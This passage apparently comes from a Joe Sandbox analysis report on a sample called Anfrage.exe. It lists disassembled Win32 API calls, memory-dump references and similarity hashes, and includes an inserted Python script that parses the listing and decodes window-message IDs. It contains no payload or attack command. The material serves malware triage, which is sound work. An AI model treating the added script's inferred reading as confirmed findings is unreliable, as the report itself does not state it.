• Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          APIs
                                                                          • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 0040417C
                                                                          • GetDlgItem.USER32(00000000,000003E8), ref: 00404190
                                                                          • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004041AE
                                                                          • GetSysColor.USER32(?), ref: 004041BF
                                                                          • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004041CE
                                                                          • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004041DD
                                                                          • lstrlenA.KERNEL32(?), ref: 004041E0
                                                                          • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004041EF
                                                                          • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404204
                                                                          • GetDlgItem.USER32(?,0000040A), ref: 00404266
                                                                          • SendMessageA.USER32(00000000), ref: 00404269
                                                                          • GetDlgItem.USER32(?,000003E8), ref: 00404294
                                                                          • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004042D4
                                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 004042E3
                                                                          • SetCursor.USER32(00000000), ref: 004042EC
                                                                          • ShellExecuteA.SHELL32(0000070B,open,0042E3A0,00000000,00000000,00000001), ref: 004042FF
                                                                          • LoadCursorA.USER32(00000000,00007F00), ref: 0040430C
                                                                          • SetCursor.USER32(00000000), ref: 0040430F
                                                                          • SendMessageA.USER32(00000111,00000001,00000000), ref: 0040433B
                                                                          • SendMessageA.USER32(00000010,00000000,00000000), ref: 0040434F
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                          • String ID: Call$N$open
                                                                          • API String ID: 3615053054-2563687911
                                                                          • Opcode ID: 0fabdefe5dfe810703eedaaf7f5204b78cec4d5337582d6cb8c9095239a0e9c5
                                                                          • Instruction ID: 596f938780ddc00ccda35ae91e452bcb2762d229451626cd39d0fa48fc5db7d6
                                                                          • Opcode Fuzzy Hash: 0fabdefe5dfe810703eedaaf7f5204b78cec4d5337582d6cb8c9095239a0e9c5
                                                                          • Instruction Fuzzy Hash: FC61B3B1A40209BFEB109F60DD45F6A7B69FB84701F10803AFB04BA2D1C7B8A951CB58
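The block below is an added example, not part of the Joe Sandbox report or of Joe Sandbox's own tooling: a small Python parser for the `APIs` bullet lines above that resolves the raw SendMessageA message numbers to their Win32 names (richedit.h and commctrl.h constants, with WM_USER = 0x400 and LVM_FIRST = 0x1000). Read that way, the function spanning 0040417C to 0040434F is a rich-edit license page with clickable links: EM_AUTOURLDETECT and EM_SETEVENTMASK with ENM_LINK|ENM_KEYEVENTS (0x04010000) switch on link notifications, EM_GETTEXTRANGE pulls the clicked URL out of the control, and ShellExecuteA "open" hands it to the default handler. That reading is an inference from the listing, not a finding stated by the report. The sample input is copied from the listing above; the TRIAGE_APIS set and the hWnd-omission heuristic in decode_message are the example's own assumptions.

```python
"""Parse the 'APIs' bullet lines of a Joe Sandbox code-analysis listing and
resolve SendMessageA message IDs to Win32 names. Handled line shapes:
    • Api.MODULE(arg,...), ref: ADDR
      • Part of subcall function ADDR: Api.MODULE(arg,...), ref: ADDR
    • Api.MODULE ref: ADDR                (no resolved arguments)"""
from __future__ import annotations
import re
from dataclasses import dataclass

# Input copied from the report listing: license-page function, a subcall line and
# the argument-less wsprintfA from the [Rename] function, one list-view message.
SAMPLE = """\
• SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004041AE
• SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004041DD
• SendMessageA.USER32(00000000), ref: 00404269
• SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004042D4
• ShellExecuteA.SHELL32(0000070B,open,0042E3A0,00000000,00000000,00000001), ref: 004042FF
• SendMessageA.USER32(00000111,00000001,00000000), ref: 0040433B
• SendMessageA.USER32(00000010,00000000,00000000), ref: 0040434F
  • Part of subcall function 00405A36: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405A5C
• wsprintfA.USER32 ref: 00405B83
• SendMessageA.USER32(?,00001013,?,00000000), ref: 00405098
"""

CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?"  # argument list optional
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})"
)

# Message constants from winuser.h, richedit.h and commctrl.h for the values
# that occur in this report.
WM_USER, LVM_FIRST = 0x0400, 0x1000
WINDOW_MESSAGES = {
    0x0010: "WM_CLOSE", 0x0111: "WM_COMMAND",
    WM_USER + 53: "EM_EXLIMITTEXT", WM_USER + 67: "EM_SETBKGNDCOLOR",
    WM_USER + 69: "EM_SETEVENTMASK", WM_USER + 73: "EM_STREAMIN",
    WM_USER + 75: "EM_GETTEXTRANGE", WM_USER + 91: "EM_AUTOURLDETECT",
    LVM_FIRST + 4: "LVM_GETITEMCOUNT", LVM_FIRST + 7: "LVM_INSERTITEMA",
    LVM_FIRST + 19: "LVM_ENSUREVISIBLE",
}

# Calls to look at first (handler launch, file creation, COM class lookup).
# An analyst's choice for this example, not something the report defines.
TRIAGE_APIS = {"ShellExecuteA", "CreateFileA", "SetFilePointer", "CLSIDFromString"}


@dataclass
class ApiCall:
    api: str
    module: str
    args: list[str]
    ref: int
    subcall_of: int | None = None
    message: str | None = None  # decoded uMsg, SendMessageA only


def parse_arg(tok: str) -> int | None:
    """Value of an 8-digit hex argument (optionally negative); None for '?' or strings."""
    m = re.fullmatch(r"(-?)([0-9A-Fa-f]{8})", tok.strip())
    if not m:
        return None
    return -int(m.group(2), 16) if m.group(1) else int(m.group(2), 16)


def decode_message(args: list[str]) -> str | None:
    """Resolve uMsg. The report omits unresolved arguments, so the hWnd slot is
    sometimes missing (3-argument WM_COMMAND/WM_CLOSE calls); check both slots."""
    for tok in args[:2]:
        name = WINDOW_MESSAGES.get(parse_arg(tok))
        if name:
            return name
    return None


def parse_listing(text: str) -> list[ApiCall]:
    """Turn the bullet lines into ApiCall records; headings are skipped."""
    calls: list[ApiCall] = []
    for line in text.splitlines():
        m = CALL_RE.match(line)
        if not m:
            continue
        # Comma split is safe here: no string argument in this report contains ',' or ')'.
        args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
        call = ApiCall(m.group("api"), m.group("mod"), args, int(m.group("ref"), 16),
                       int(m.group("sub"), 16) if m.group("sub") else None)
        if call.api == "SendMessageA":
            call.message = decode_message(args)
        calls.append(call)
    return calls


def summarize(calls: list[ApiCall]) -> dict:
    """Distinct APIs per module, decoded messages in call order, flagged calls."""
    by_module: dict[str, set[str]] = {}
    for c in calls:
        by_module.setdefault(c.module, set()).add(c.api)
    return {
        "by_module": {mod: sorted(apis) for mod, apis in sorted(by_module.items())},
        "messages": [c.message for c in calls if c.message],
        "flagged": [f"{c.api} @ {c.ref:08X}" for c in calls if c.api in TRIAGE_APIS],
    }


if __name__ == "__main__":
    for key, value in summarize(parse_listing(SAMPLE)).items():
        print(key, value)
```

Running the block prints the per-module API sets, the decoded message sequence and the flagged calls for the sample. The regular expression covers only the three line shapes that occur in this report, and the message table only the values that appear in it; both are meant to be extended when the same approach is applied to another function listing.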
                                                                          APIs
                                                                          • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                                          • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                          • DrawTextA.USER32(00000000,Hves Setup,000000FF,00000010,00000820), ref: 00401156
                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                          • String ID: F$Hves Setup
                                                                          • API String ID: 941294808-4240652887
                                                                          • Opcode ID: b3683ee5f9b0c2be8bfd93dc29e84564bacc2454be597716fe8f92258ad350e3
                                                                          • Instruction ID: eed311f0ba3f5168439b37af4fa11fc7bb37c730dc1785cefb354bf9b42296a2
                                                                          • Opcode Fuzzy Hash: b3683ee5f9b0c2be8bfd93dc29e84564bacc2454be597716fe8f92258ad350e3
                                                                          • Instruction Fuzzy Hash: FF418C71800209AFCF059F95DE459AFBBB9FF44314F00842EF9A1AA1A0C774E955DFA4
                                                                          APIs
                                                                          • lstrcpyA.KERNEL32(0042C5F8,NUL,?,00000000,?,00000000,00405C9F,?,?), ref: 00405B1B
                                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,00405C9F,?,?), ref: 00405B3F
                                                                          • GetShortPathNameA.KERNEL32(?,0042C5F8,00000400), ref: 00405B48
                                                                            • Part of subcall function 0040599B: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405BF8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004059AB
                                                                            • Part of subcall function 0040599B: lstrlenA.KERNEL32(00000000,?,00000000,00405BF8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004059DD
                                                                          • GetShortPathNameA.KERNEL32(0042C9F8,0042C9F8,00000400), ref: 00405B65
                                                                          • wsprintfA.USER32 ref: 00405B83
                                                                          • GetFileSize.KERNEL32(00000000,00000000,0042C9F8,C0000000,00000004,0042C9F8,?,?,?,?,?), ref: 00405BBE
                                                                          • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405BCD
                                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C05
                                                                          • SetFilePointer.KERNEL32(0040A3B0,00000000,00000000,00000000,00000000,0042C1F8,00000000,-0000000A,0040A3B0,00000000,[Rename],00000000,00000000,00000000), ref: 00405C5B
                                                                          • GlobalFree.KERNEL32(00000000), ref: 00405C6C
                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405C73
                                                                            • Part of subcall function 00405A36: GetFileAttributesA.KERNELBASE(00000003,00402D3A,C:\Users\user\Desktop\Anfrage.exe,80000000,00000003), ref: 00405A3A
                                                                            • Part of subcall function 00405A36: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405A5C
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                          • String ID: %s=%s$NUL$[Rename]
                                                                          • API String ID: 222337774-4148678300
                                                                          • Opcode ID: 5ce72f1d5662fdfb16fbdc716e83a23565de7620f696fffa2ec6c38a8c937bd1
                                                                          • Instruction ID: 6293277805e4fd93310031222b01184603883beffbc8e30d5776d07611dc3463
                                                                          • Opcode Fuzzy Hash: 5ce72f1d5662fdfb16fbdc716e83a23565de7620f696fffa2ec6c38a8c937bd1
                                                                          • Instruction Fuzzy Hash: 0D310171204B19BBE2206B255E89F6B3A5CDF42758F14013AFE41F22D2DA7C9C058EAD
                                                                          APIs
                                                                          • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Anfrage.exe",75573410,C:\Users\user\AppData\Local\Temp\,00000000,0040317E,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403393), ref: 00406086
                                                                          • CharNextA.USER32(?,?,?,00000000), ref: 00406093
                                                                          • CharNextA.USER32(?,"C:\Users\user\Desktop\Anfrage.exe",75573410,C:\Users\user\AppData\Local\Temp\,00000000,0040317E,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403393), ref: 00406098
                                                                          • CharPrevA.USER32(?,?,75573410,C:\Users\user\AppData\Local\Temp\,00000000,0040317E,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403393), ref: 004060A8
                                                                          Strings
                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 0040602F
                                                                          • *?|<>/":, xrefs: 00406076
                                                                          • "C:\Users\user\Desktop\Anfrage.exe", xrefs: 0040606A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: Char$Next$Prev
                                                                          • String ID: "C:\Users\user\Desktop\Anfrage.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                          • API String ID: 589700163-1408480782
                                                                          • Opcode ID: c65cd21f9bebafd0fa0734b05f9293669e0a6699517ac04d9452259f54362241
                                                                          • Instruction ID: 6dd00fd98cdd52380b6000705bfe1b2e5a3199cd407f9fb4c243556cad1baf37
                                                                          • Opcode Fuzzy Hash: c65cd21f9bebafd0fa0734b05f9293669e0a6699517ac04d9452259f54362241
                                                                          • Instruction Fuzzy Hash: E81104A28847952DEB3296344C44B776F894F967A0F19007BE8C6722C3CA7C5CA2836D
                                                                          APIs
                                                                          • GetWindowLongA.USER32(?,000000EB), ref: 0040402C
                                                                          • GetSysColor.USER32(00000000), ref: 00404048
                                                                          • SetTextColor.GDI32(?,00000000), ref: 00404054
                                                                          • SetBkMode.GDI32(?,?), ref: 00404060
                                                                          • GetSysColor.USER32(?), ref: 00404073
                                                                          • SetBkColor.GDI32(?,?), ref: 00404083
                                                                          • DeleteObject.GDI32(?), ref: 0040409D
                                                                          • CreateBrushIndirect.GDI32(?), ref: 004040A7
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                          • String ID:
                                                                          • API String ID: 2320649405-0
                                                                          • Opcode ID: ae3d8a9df92c775f8f54e71e017c7c1ec6869770dfd215418e325c2b67ca61e7
                                                                          • Instruction ID: 4b93f18e3972f6c94df15fd0826ae0e2c8d28fcec101fb7672849d56c603d5ef
                                                                          • Opcode Fuzzy Hash: ae3d8a9df92c775f8f54e71e017c7c1ec6869770dfd215418e325c2b67ca61e7
                                                                          • Instruction Fuzzy Hash: 792124B1500744ABCB319F78DD48B5BBBF8AF41714B04892DEA96F22A0D734D944CB55
                                                                          APIs
                                                                          • GlobalFree.KERNEL32(00000000), ref: 1000234A
                                                                            • Part of subcall function 10001224: lstrcpynA.KERNEL32(00000000,?,100012CF,-1000404B,100011AB,-000000A0), ref: 10001234
                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 100022C3
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 100022D8
                                                                          • GlobalAlloc.KERNEL32(00000040,00000010), ref: 100022E7
                                                                          • CLSIDFromString.OLE32(00000000,00000000), ref: 100022F4
                                                                          • GlobalFree.KERNEL32(00000000), ref: 100022FB
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2139530556.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                          • Associated: 00000000.00000002.2139512227.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                          • Associated: 00000000.00000002.2139550102.0000000010003000.00000002.00000001.01000000.00000005.sdmp
                                                                          • Associated: 00000000.00000002.2139589277.0000000010005000.00000002.00000001.01000000.00000005.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_10000000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
                                                                          • String ID:
                                                                          • API String ID: 3730416702-0
                                                                          • Opcode ID: 8ca201b8c9dcbb45ad50e4cb45e4e1ae2e8a5d70f393ea2d6c63899163ff979d
                                                                          • Instruction ID: bfa8c22ebd78897ea4dc14f883c746723b208fa17a75ef0c69fbb79ff87ab60c
                                                                          • Opcode Fuzzy Hash: 8ca201b8c9dcbb45ad50e4cb45e4e1ae2e8a5d70f393ea2d6c63899163ff979d
                                                                          • Instruction Fuzzy Hash: B541ABB1108311EFF320DFA48884B5BB7F8FF443D1F218529F946D61A9DB34AA448B61
                                                                          APIs
                                                                            • Part of subcall function 10001215: GlobalAlloc.KERNELBASE(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D
                                                                          • GlobalFree.KERNEL32(?), ref: 100024B5
                                                                          • GlobalFree.KERNEL32(00000000), ref: 100024EF
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2139530556.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                          • Associated: 00000000.00000002.2139512227.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                          • Associated: 00000000.00000002.2139550102.0000000010003000.00000002.00000001.01000000.00000005.sdmp
                                                                          • Associated: 00000000.00000002.2139589277.0000000010005000.00000002.00000001.01000000.00000005.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_10000000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: Global$Free$Alloc
                                                                          • String ID:
                                                                          • API String ID: 1780285237-0
                                                                          • Opcode ID: 8ed12168559ed504bf2d16f5614b25cf9b7800a5843296302d7a865f42518c80
                                                                          • Instruction ID: 4e6b36a645f71e2aed4a85f2c36ff1861f2741140ba068ae73f9b0a79c1593cf
                                                                          • Opcode Fuzzy Hash: 8ed12168559ed504bf2d16f5614b25cf9b7800a5843296302d7a865f42518c80
                                                                          • Instruction Fuzzy Hash: EA319CB1504250EFF322CF64CCC4C6B7BBDEB852D4B124529FA4193168CB31AC94DB62
                                                                          APIs
                                                                          • lstrlenA.KERNEL32(0042A048,00000000,0041C020,755723A0,?,?,?,?,?,?,?,?,?,0040308E,00000000,?), ref: 00405015
                                                                          • lstrlenA.KERNEL32(0040308E,0042A048,00000000,0041C020,755723A0,?,?,?,?,?,?,?,?,?,0040308E,00000000), ref: 00405025
                                                                          • lstrcatA.KERNEL32(0042A048,0040308E,0040308E,0042A048,00000000,0041C020,755723A0), ref: 00405038
                                                                          • SetWindowTextA.USER32(0042A048,0042A048), ref: 0040504A
                                                                          • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405070
                                                                          • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040508A
                                                                          • SendMessageA.USER32(?,00001013,?,00000000), ref: 00405098
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                          • String ID:
                                                                          • API String ID: 2531174081-0
                                                                          • Opcode ID: 3b2410e8308c6412343eb032780aba43e390b926bae686ddbb8ef07075a9bc68
                                                                          • Instruction ID: 94b0b073a5ce97ddacba51ea26bc878ee4e16423412cd9a98c67571b7997b3ab
                                                                          • Opcode Fuzzy Hash: 3b2410e8308c6412343eb032780aba43e390b926bae686ddbb8ef07075a9bc68
                                                                          • Instruction Fuzzy Hash: D5219D71900518BBDF119FA5CD84ADFBFA9EF04354F14807AF944B6291C6398E40CFA8
                                                                          APIs
                                                                          • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 004048C2
                                                                          • GetMessagePos.USER32 ref: 004048CA
                                                                          • ScreenToClient.USER32(?,?), ref: 004048E4
                                                                          • SendMessageA.USER32(?,00001111,00000000,?), ref: 004048F6
                                                                          • SendMessageA.USER32(?,0000110C,00000000,?), ref: 0040491C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: Message$Send$ClientScreen
                                                                          • String ID: f
                                                                          • API String ID: 41195575-1993550816
                                                                          • Opcode ID: 33c806690141bddee9d4868c528a06b643bfd418e36cfd9cd505f5ef0f9636f7
                                                                          • Instruction ID: b60015b5b4e1efc5408348c5136693cdb789d2fb79533d825e55e5a5312c0c55
                                                                          • Opcode Fuzzy Hash: 33c806690141bddee9d4868c528a06b643bfd418e36cfd9cd505f5ef0f9636f7
                                                                          • Instruction Fuzzy Hash: CE015EB590021DBAEB00DBA4DD85BFFBBBCAF55711F10412BBA50B61C0C7B499018BA4
                                                                          APIs
                                                                          • GetDC.USER32(?), ref: 00401D98
                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DB2
                                                                          • MulDiv.KERNEL32(00000000,00000000), ref: 00401DBA
                                                                          • ReleaseDC.USER32(?,00000000), ref: 00401DCB
                                                                          • CreateFontIndirectA.GDI32(0040B818), ref: 00401E1A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmp
